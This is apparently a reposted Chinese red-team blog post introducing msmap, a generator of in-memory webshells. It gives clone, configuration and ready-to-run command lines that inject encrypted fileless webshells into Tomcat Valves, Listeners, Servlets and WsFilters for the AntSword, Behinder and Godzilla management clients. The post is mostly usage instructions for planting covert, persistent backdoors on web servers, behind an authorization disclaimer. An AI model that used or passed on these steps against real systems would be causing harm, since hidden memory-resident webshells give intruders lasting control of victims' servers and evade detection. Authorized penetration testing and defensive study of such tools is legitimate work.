工具介绍
Msmap是一个内存马生成器,兼容多种容器、组件、编码器、WebShell / Proxy / Killer 和管理客户端。本文中涉及到的所有操作均得到了客户单位的授权,并且在漏洞修复后得以公开。请勿在未授权状态下进行任何形式的渗透测试!!!!
安装与使用
1、一般使用方法
git clone [email protected]:hosch3n/msmap.git
cd msmap
python generator.py
[注意] 尽量用独一无二的密码;各选项大小敏感
2、进阶使用方法
编辑 config/environment.py
# 自动编译
auto_build = True
# Base64编码类字节码
b64_class = True
# 生成脚本
generate_script = True
# 编译器绝对路径
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe"
编辑 gist/java/container/tomcat/servlet.py
// Servlet路径匹配规则
private static String pattern = "*.xml";
WsFilter暂不支持自动编译。如果使用了加密编码器,密码需要与路径相同(如/passwd)
3、蚁剑
JSP类型 搭配 default 编码器 | 注入到 Tomcat Valve
python generator.py Java Tomcat Valve RAW AntSword passwd
JSP类型 搭配 aes_128_ecb_pkcs7_padding_md5 编码器 | 注入到 Tomcat Listener
python generator.py Java Tomcat Listener AES128 AntSword passwd
JSP类型 搭配 rc_4_sha256 编码器 | 注入到 Tomcat Servlet
python generator.py Java Tomcat Servlet RC4 AntSword passwd
JSPJS类型 搭配 aes_128_ecb_pkcs7_padding_md5 编码器 | 注入到 Tomcat WsFilter
python generator.py Java Tomcat WsFilter AES128 JSPJS passwd
4、冰蝎
default_aes类型 | 注入到 Tomcat Valve
python generator.py Java Tomcat Valve AES128 Behinder rebeyond
5、哥斯拉
JAVA_AES_BASE64类型 | 注入到 Tomcat Valve
python generator.py Java Tomcat Valve AES128 Godzilla superidol
下载地址
项目地址:
https://github.com/hosch3n/msmap
长风实验室发布、转载的文章中所涉及的技术、思路和工具,仅供以网络安全为目的的学习交流使用,不得用作它途。部分文章来源于网络,如有侵权请联系删除。
“
长按扫码关注
获取更多精彩内容
原文始发于微信公众号(长风实验室):红队武器库 | 内存马生成器 -- msmap
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论